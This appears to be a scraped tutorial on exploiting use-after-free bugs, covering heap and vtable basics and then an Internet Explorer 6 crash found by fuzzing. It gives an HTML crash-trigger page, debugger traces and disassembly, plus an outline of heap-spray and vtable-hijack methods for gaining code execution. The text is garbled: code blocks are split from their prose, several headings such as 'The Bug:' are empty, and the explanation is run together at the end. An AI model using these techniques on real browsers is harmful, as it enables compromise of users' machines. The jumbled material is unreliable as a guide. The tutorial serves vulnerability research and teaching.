Beginners Guide to "Use after free Exploits #IE 6 0-day #Exploit Development"

Memory used by program is divided into four,



The code area aka text segment [compiled program in memory ].

The globals [global variables are stored] .

Initialized Data Segment

Uninitialized Data Segment.

The heap, dynamically allocated variables.

The stack, parameters and local variables .

Code: int a = 0; char * fb ="fb1h2s";

Code: int a int b ;

PHP Code: void f ()

{

if( true ) {

int b = 0 ;

}

b = 1 ;

}



Example Program Demonstrating memory allocations.



PHP Code:

int * x ; /* Uninitialized variable stored in bss*/

int w ; /* Uninitialized variable stored in bss*/

int y = 10 ; /* Initialized variable stored in DSS*/

void b ()

{

if( 1 == 1 )

{

x = malloc ( sizeof (int)); /* Memmory allocated in Heap */

/*memory not freed */

}



}



void c ()

{

free ( x ); /* Memory Freed */

}

int main ( void )

{

static int f = 10 ; /* Initialized static variable stored in DS */

static int i ; /* Uninitialized static variable stored in bss */

b ();

c ();

return 0 ;

}



Use after free issues and example buggy codes.



Example Buggy program:



Code: int main(void) { char *ch_ptr = malloc(100); int i; for (i = 0; i < 99; i++) { ch_ptr = 'A'; free(ch_ptr); printf("%s

", ch_ptr); } }

The buggy code:





The Bug:



The Fix:



frag_len = frag->msg_header.frag_len;

"

Fuzzing for Use After Free and Fuzzers



Exploiting Use after free bugs.



C++ Virtual Functions :

PHP Code: #include<iostream>

using namespace std ;



class Test

{

public :



virtual void Show ()

{

cout << "I am in Test Class" << endl ;

}

};



class Test1 : public Test

{

public:

virtual void Show ()

{

cout << "I am in Test1 Class" << endl ;

}



};



int main ()

{

Test * Obj ;



Test Obj1 ; // Base Class Object



Test1 Obj2 ; //Derived Class Object



Obj = & Obj2 ;



Obj -> Show (); //In this case derived class show function called.



Obj = & Obj1 ;



Obj -> Show (); //In this case Base class show function called.

}



[ B ]And the output is :[/ B ]



[ CODE ] I am in Test1 Class

I am in Test Class[/ CODE ]



Code: Class Test size(8): +--- |{vfptr} +--- Test's Vftable: +-- | {vfptr} | &test::Show Class Test1 size(8): +--- |{vfptr} +--- Test1's Vftable: +-- | {vfptr} | &test1::Show

Code: 004013D0 |. 8D45 C8 LEA EAX,DWORD PTR SS:[EBP-38] 004013D3 |. 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX 004013D6 |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004013D9 |. 8B10 MOV EDX,DWORD PTR DS:[EAX] 004013DB |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004013DE |. 890424 MOV DWORD PTR SS:[ESP],EAX 004013E1 |. 8B02 MOV EAX,DWORD PTR DS:[EDX] 004013E3 |. FFD0 CALL EAX Here EAX point to the Virtual Function table which point to calls the "Test1" 004013E5 |. C70424 0000440>MOV DWORD PTR SS:[ESP],vfunc.00440000 ; |ASCII "pause" 004013EC |. E8 AFF20000 CALL <JMP.&msvcrt.system> ; \system 004013F1 |. 8D45 D8 LEA EAX,DWORD PTR SS:[EBP-28] 004013F4 |. 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX 004013F7 |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004013FA |. 8B10 MOV EDX,DWORD PTR DS:[EAX] 004013FC |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004013FF |. 890424 MOV DWORD PTR SS:[ESP],EAX 00401402 |. 8B02 MOV EAX,DWORD PTR DS:[EDX] 00401404 |. FFD0 CALL EAX Here EAX point to the Virtual Function table and calls the "Test" class 00401406 |. C70424 0000440>MOV DWORD PTR SS:[ESP],vfunc.00440000 ; |ASCII "pause" 0040140D |. E8 8EF20000 CALL <JMP.&msvcrt.system> ; \system 00401412 |. B8 00000000 MOV EAX,0 00401417 |. C9 LEAVE 00401418 \. C3 RETN

Code: 0:000> t eax=00410a5c ebx=00004000 ecx=0040cc50 edx=00441c84 esi=00def786 edi=00def6f2 eip=004013e3 esp=0022ff10 ebp=0022ff78 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 image00400000+0x13e3: 004013e3 ffd0 call eax {image00400000+0x10a5c (00410a5c)} 0:000> u 00410a5c image00400000+0x10a5c: 00410a5c 55 push ebp 00410a5d 89e5 mov ebp,esp 00410a5f 83ec08 sub esp,8 00410a62 c744240419004400 mov dword ptr [esp+4],offset image00400000+0x40019 (00440019) 00410a6a c70424c0334400 mov dword ptr [esp],offset image00400000+0x433c0 (004433c0) 00410a71 e8a6b60200 call image00400000+0x3c11c (0043c11c) 00410a76 c7442404ecae4300 mov dword ptr [esp+4],offset image00400000+0x3aeec (0043aeec) 00410a7e 890424 mov dword ptr [esp],eax

De allocate an object having a VFT entry

Controlling the Vftable and pointing it to out own [shellcode]code.

So now when a Virtual Function call takes place it point to our injected code.

Use After Free Exploitation [IE 6 0-day].



HTML Code: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTAL 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns= "http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content-Type" content= "text/html; charset=utf-8" /> <meta http-equiv="refresh" content= "1" > <title> FB1H2S Browser Test , soemthing weired here </title> <link href= "sass.css" rel= "stylesheet" type= "text/css" /> <script src= "http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type= "text/javascript" > </script> <script> document.write("FB1H2S Use After Free test#213"); </script> </head> <body> <div style= "float:left; width:770px; margin-left:8px;" > <div class= "fb1h2s_fb1h2s" > </div> <span > </span> <div class= "fb1h2s_fb1h2s_fb1h2s" > <div class= "fb1h2s_fb1h2s_fb1h4s" > IE WTF </div> <div class= "aboutproduct" > FB1H2s : FB!H2S : THE Garage 4 Hackers : Bla Bla Bla </div> </div> <div class= "fb1h2s_fb1h2s_fb1h3s" > </div> </div> </body> </html> sass.css .fb1h2s_fb1h2s, .fb1h2s_fb1h2s_fb1h2s{background-color:#fff;width:564px;float:left;height:auto;marg in:5px 0 5px 9px} .fb1h2s_fb1h2s_fb1h3s{float:left;width:164px;margi n-left:5px} .fb1h2s_fb1h2s_fb1h4s{width:551px;height:34px;back ground-repeat:no-repeat;font-size:13px;font-weight:700;font-family:arial;margin-left:10px;float:left;padding:7px 0 0 10px} .aboutproduct{width:530px;height:auto;text-align:justify;line-height:18px;float:left;font-family:arial;color:#333;margin-bottom:10px;padding:0 5px 5px 13px}

Code: (914.8fc): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=04cb4740 ebx=00000000 ecx=04cb4740 edx=04b80bfc esi=04cd8b40 edi=00080000 eip=7d51f463 esp=0013e5a4 ebp=0013e5f0 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CDispNode::GetRootNode+0x6: 7d51f463 8b4808 mov ecx,dword ptr [eax+8] ds:0023:04cb4748=????????

Code: 0:000> knL # ChildEBP RetAddr 00 0013b478 7d54f5c0 mshtml!CDispNode::GetDispRoot+0x12 01 0013b4bc 7d55118b mshtml!CDispNode::ReplaceNode+0xdb 02 0013b50c 7d50b3ad mshtml!CLayout::EnsureDispNodeCore+0x348 03 0013b5bc 7d688af4 mshtml!CLayout::EnsureDispNode+0x5a 04 0013b7f0 7d5b170b mshtml!CFlowLayout::CalcSizeCoreCSS1Strict+0x3ff 05 0013b808 7d50a136 mshtml!CFlowLayout::CalcSizeCore+0x2f 06 0013b840 7d5069d1 mshtml!CFlowLayout::CalcSizeVirtual+0x17e 07 0013b954 7d539257 mshtml!CLayout::CalcSize+0x224 08 0013b9c8 7d539def mshtml!CFlowLayout::MeasureSite+0x1e5 09 0013ba0c 7d539d26 mshtml!CFlowLayout::GetSiteWidth+0x12b 0a 0013ba38 7d6ca5e3 mshtml!CLSMeasurer::GetSiteWidth+0x80 0b 0013bb44 7d5befb2 mshtml!CRecalcLinePtr::AlignObjects+0x30b 0c 0013bbc4 7d5136e0 mshtml!CRecalcLinePtr::CalcAlignedSitesAtBOLCore+0x1d7 0d 0013bc14 7d514345 mshtml!CRecalcLinePtr::CalcAlignedSitesAtBOL+0xa9 0e 0013bcc8 7d5131cd mshtml!CRecalcLinePtr::MeasureLine+0x384 0f 0013c084 7d5114a5 mshtml!CDisplay::RecalcLinesWithMeasurer+0x502 10 0013c204 7d506252 mshtml!CDisplay::RecalcLines+0x67 11 0013c21c 7d506529 mshtml!CDisplay::RecalcView+0x6b 12 0013c2c4 7d689582 mshtml!CFlowLayout::CalcTextSize+0x2ee 13 0013c4fc 7d5b170b mshtml!CFlowLayout::CalcSizeCoreCSS1Strict+0xe8d

Code: mshtml!CDispNode::GetRootNode+0x6: 7d51f463 8b4808 mov ecx,dword ptr [eax+8] 7d51f466 85c9 test ecx,ecx 7d51f468 7404 je mshtml!CDispNode::GetRootNode+0xd (7d51f46e) 7d51f46a 8bc1 mov eax,ecx 7d51f46c ebf5 jmp mshtml!CDispNode::GetRootNode+0x6 (7d51f463) 7d51f46e c3 ret

Code: mshtml!CDispNode::GetDispRoot: 7d51f437 8bff mov edi,edi 7d51f439 56 push esi 7d51f43a e822000000 call mshtml!CDispNode::GetRootNode (7d51f461) 7d51f43f 8bf0 mov esi,eax 7d51f441 85f6 test esi,esi 7d51f443 0f84c1020000 je mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a) 7d51f449 8b06 mov eax,dword ptr [esi] 7d51f44b 8bce mov ecx,esi 7d51f44d ff5034 call dword ptr [eax+34h] 7d51f450 85c0 test eax,eax 7d51f452 0f84b2020000 je mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a) 7d51f458 8bc6 mov eax,esi 7d51f45a 5e pop esi 7d51f45b c3 ret 7d51f45c 90 nop 7d51f45d 90 nop 7d51f45e 90 nop 7d51f45f 90 nop 7d51f460 90 nop mshtml!CDispNode::GetRootNode: 7d51f461 8bc1 mov eax,ecx 7d51f463 8b4808 mov ecx,dword ptr [eax+8] ds:0023:04cb4748=???????? 7d51f466 85c9 test ecx,ecx 7d51f468 7404 je mshtml!CDispNode::GetRootNode+0xd (7d51f46e) 7d51f46a 8bc1 mov eax,ecx 7d51f46c ebf5 jmp mshtml!CDispNode::GetRootNode+0x6 (7d51f463) 7d51f46e c3 ret

The C equivalent code:



PHP Code: int __thiscall CElement__GetParentAncestorSafe ( int this , int a2 )

{

int result ; // eax@1

int v3 ; // ecx@1

int v4 ; // ecx@2



v3 = *( _DWORD *)( this + 16 );

result = 0 ;

if ( v3 )

{

v4 = *( _DWORD *)( v3 + 4 );

if ( v4 )

{

do

{

if ( *( _BYTE *)( v4 + 8 ) == a2 )

break;

v4 = *( _DWORD *)( v4 + 4 );

}

while ( v4 );

if ( v4 )

result = *( _DWORD *) v4 ;

}

}

return result ;

}



/( 7D51F437 )

void * __thiscall CDispNode__GetDispRoot ( void * this )

{

void * v1 ; // eax@1

void * v2 ; // esi@1

void * result ; // eax@3



v1 = CDispNode__GetRootNode ( this );

v2 = v1 ;

if ( v1 && (*( int ( __thiscall **)( _DWORD ))(*( _DWORD *) v1 + 52 ))( v1 ) )

result = v2 ;

else

result = 0 ;

return result ;

}



Code: >u 7d51f463 7d51f463 8b4808 mov ecx,dword ptr [eax+8]

Code: 0:000> d 04cb4748 04cb4748 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 04cb4758 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 04cb4768 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 04cb4778 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????

Code: 7d51f466 85c9 test ecx,ecx 7d51f468 7404 je mshtml!CDispNode::GetRootNode+0xd (7d51f46e) 7d51f46a 8bc1 mov eax,ecx 7d51f46c ebf5 jmp mshtml!CDispNode::GetRootNode+0x6 (7d51f463) 7d51f46e c3 ret

Code: ecx = dword ptr[ eax+8 ] if (ecx ==0): -7d51f46e: return(eax) to 7d51f43f [calling module] | | else: | loop() | |-> and at:7d51f43f { mov esi,eax <-- value of eax returned form the above function test esi,esi <-- if (esi) ==0 take jmp je mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a) mov eax,dword ptr [esi] ds:0023:04ca1d40= <-- move to eax data pointed by esi mov ecx,esi <-- not usefull call dword ptr [eax+34h] <-- call adress pointed by eax+34h }

Code: 7d51f44d ff5034 call dword ptr [eax+34h]

Code: (36c.440): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=01c53380 ecx=01c3e6e0 edx=000000a4 esi=01c3e6e0 edi=01c071f4 eip=7d51f44d esp=0013b478 ebp=0013b4bc iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CDispNode::GetDispRoot+0x12: 7d51f44d ff5034 call dword ptr [eax+34h] ds:0023:00000034=???????? Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data.

Code: mshtml!CDispNode::GetDispRoot: 7d51f437 8bff mov edi,edi 7d51f439 56 push esi 7d51f43a e822000000 call mshtml!CDispNode::GetRootNode (7d51f461) 7d51f43f 8bf0 mov esi,eax 7d51f441 85f6 test esi,esi 7d51f443 0f84c1020000 je mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a) 7d51f449 8b06 mov eax,dword ptr [esi] 7d51f44b 8bce mov ecx,esi 7d51f44d ff5034 call dword ptr [eax+34h] ds:0023:00000034=???????? 7d51f450 85c0 test eax,eax 7d51f452 0f84b2020000 je mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a)

7d51f449 8b06 mov eax,dword ptr [esi]



7d51f44d ff5034 call dword ptr [eax+34h]





Code: 7d51f463 8b4808 mov ecx,dword ptr [eax+8]

Code: 7d51f44d ff5034 call dword ptr [eax+34h]

1) The double reference exploit

Requirements:

Method:

2) The VFTable exploit

Requirements:





Method:

Depends:



The Lookaside exploit



Requirements:

Method:



Yea right!Last week a friend asked few queries regarding use after free vulnerabilities, . It's been a while I wrote a tutorial so taught of cooking a beginners guide this week end. I wanted a live target for the tutorial so my plans were to run my fuzzer on an old version of IE 6, since it is easy to find a bug in and it's not worth to blog out any new versions 0-day. Any way I picked up the first test case IE crashed on and did some analysis to add it up to this tutorial.I din't spent much time with the crash since it's pointless to digg deepSo this blog post I will explain in detail the following.1)The OS Heap and memory allocations.2)Use after free issues and example buggy codes.3) Analysis of a IE 6 crash, Use after free issue.4) Exploiting Use after free bugs.*Stay tuned for som Win8 IE10 stuffs ;The Basics of OS Memory Management :This is the region in a virtual adress space that holds the executing instructions.It is is assigned memory below the stack and heap, to prevent an overflow overwriting the code.This region holds the global and static variables that are initialized by the programmer.For example:The string is stored in the initialized read only area.For example:This would be in the BSS segmentStack is a [Last in First out] data structure , so it's basically used for local storages and function calls etc .It has got it's own registers and instructions sets. So it even hold the raw byte of instruction executed by the program. This is one of the reason why stack based vulnerabilities are easy to exploit.Stack allocations are done when variables are stored directly to memory .For example:Here value of "b" is already declared and know so "int b" is allocated on the stack.*b is not available outside the if { } block, so the above program would have compilation issues.So considering the above if we need to handle memmory dynamically ,thats where Heap comes into picture. Heap overtakes the disability of stack, it's is the segment where dynamic memory allocation usually takes place.Unlike stack memmory allocations[LIFO] the term "heap memory allocations" is unrelated to heap data structure. It's basically a linked list of used and free blocks. When a request for memory is made by functions like (new,malloc,GlobalAlloc,LocalAlloc, malloc,HeapAlloc,RtlAllocateHeap etc) they are satisﬁed by providing a suitable block from one of the free blocks. This requires updating list of blocks on the heap [Heap Management ]. This meta information about the blocks on the heap is also stored on the heap often in a small area just in front of every block .The various OS implementation of heap management functions make use of these meta info when allocating and freeing heap. And the many heap based exploits out there make use of these heap management structures to achieve code execution by feeding them with malformed data.Note: Heap overflow and [Dangling pointer, Use after free bugs] are two diff things. The heap size is predefined at application startup but can grow as per required. You would use the heap if you dont know exactly how much data you will need at runtime or if you need to allocate a lot of data. Responsible for memory leak, you need to free the unused memory manually. You need to manually free memory onces it is no more in use and that should never fall out of scope. The data is freed with GlobalFree , LocalFree, delete[] free etc functions . Can have allocation failures if too big of a buﬀer is requested to be allocated. All shared libraries and dynamically loaded modules in a process could access the heap. This same reason why you can do heap spraying on a browser using any loaded modules example: flash,java script ,vbs etc.In short large variables of arrays whose size may vary, heap memory allocation is used. So heap related security issues occur when1) Not freeing all of the memory allocated ending up with memory leaks.2)Using of already released memory would lead to Use after free security issues.3) Double freeing memory would cause memory corruptions .[I]#dangling pointers #use after free #double freeal is initilized at line 424 to &frag->msg_header and at line 533 it's freed using dtls1_hm_fragment_free(frag); and at line 536 if the following condition satisfies "(if al=0)" then program will try to access "frag" line 539 which was freed at line 533. So this will cause an invalid read operation , possibly crashing the app, and if we are some how able to control the adress that its reading form [heap spray!! or what ever], then we would be able to achieve code execution.The simple fix to this was to add a temporary variable at line 533 "holding frag->msg_header.frag_len. And later return frag_len instead of the freed object.*We will have another blog post for this some time later.C++ matches a correct function call based on the type of the object at runtime. This is called dynamic binding and this is done by using the keyword. The virtual keyword instructs the compiler that it should choose the right function based on the object it's reference referred to rather than the type. These objects that are referred by virtual functions points to a virtual table VFTABLE[Virtual Function Table] . It's where all the virtual functions adress are stored. It would be the first DWORD in the object memory.Image Source: http://www.blackhat.com/presentation...07-afek-WP.pdf Example Program:The above program will have the following vftable structure.Lets put a break point on Call and analyze where EAX point to:Now that we are clear how VFtable works the exploitation of Use-after free could be done a couple of ways.The basic way of doing it would be.The program crashes on IE 6 with the following exception.The Backtrace.Disassembly of the crashed function:The entire code flow is as follows.The program crashes due to a use after free issue.Here EAX is pointer to an Object element and ECX to the vftable. Here the object pointed to by the Vftable is freed, and there by the memory location pointed by EAX.If you look at the next instructions , we notice the following .The Pesudo Code:So if we can make { mov ecx,dword ptr [eax+8] }point to the heap such a way that EAX+8 contains [00000000] and EAX contains a adress we control , we would have code execution. We can initialize this area using heap spray.What I did was arranged my HTML tags such a way that it would leave a lot of garbage values mainly null in the EAX pointed memory, and then the program would crash at the call instruction. This is never the right way of doing nor reliable, but it was working fine for me.No we could take control of the program here.Move DWORD (a 32-bit/4-byte value) in memory location specified by ESI[01c3e6e0]-->"00000000" into register EAX, so EAX becomes [00000000]The crash is at a virtual Call with [Register + offset ] . The Vftable is in eax + offset[34h] the adress of function to be executed . In this case it would be 13th entry in the table. Now that it's pointing to [00000000] the program crashes.We can take control of the program here and have code execution, for that we need to find the type of object that was freed and the no of bytes that was allocated . Knowing these details we would be able to build fake objects of that size using JS . So that a the call at 7d51f463 [eax+8] would land on our crafted Vftable object and return [00000000] anda call toVftable+34h would make the program land on our shellcode.There are couple of ways to exploit this a good reference would be this A controllable VFTable pointer.Our own code is placed in the deallocated object or some where in the memory where we could point to via Vftable.Then we replace the VFTable pointer by one which points to some memorylater we will use this as VFTable pointing back to where we put our code.A controllable VFTable .Our code is injected in the VFTable which is made to point to itself.This this achieved by the system allocation process.A controllable heap allocation / heap deallocation cycle.Since the system reallocates a freed memory , we craft the code in such a way that when reallocation takes place our injected code is used in the reallocation cycle.Read More: http://www.blackhat.com/presentation...irov-apr19.pdf Read in detail here a similar approach http://securityevaluators.com/files/.../isewoot08.pdf For choosing an appropriate method for exploitation we need determine what all we control in the current scenario and understand more about the crash. We can either use the debugger for this purpose or reverse engineer the current code to figure out those details.*Thanks to w3devil and Zarul for proof reading the docCheers.Exploitation References :Protection Mechanisms: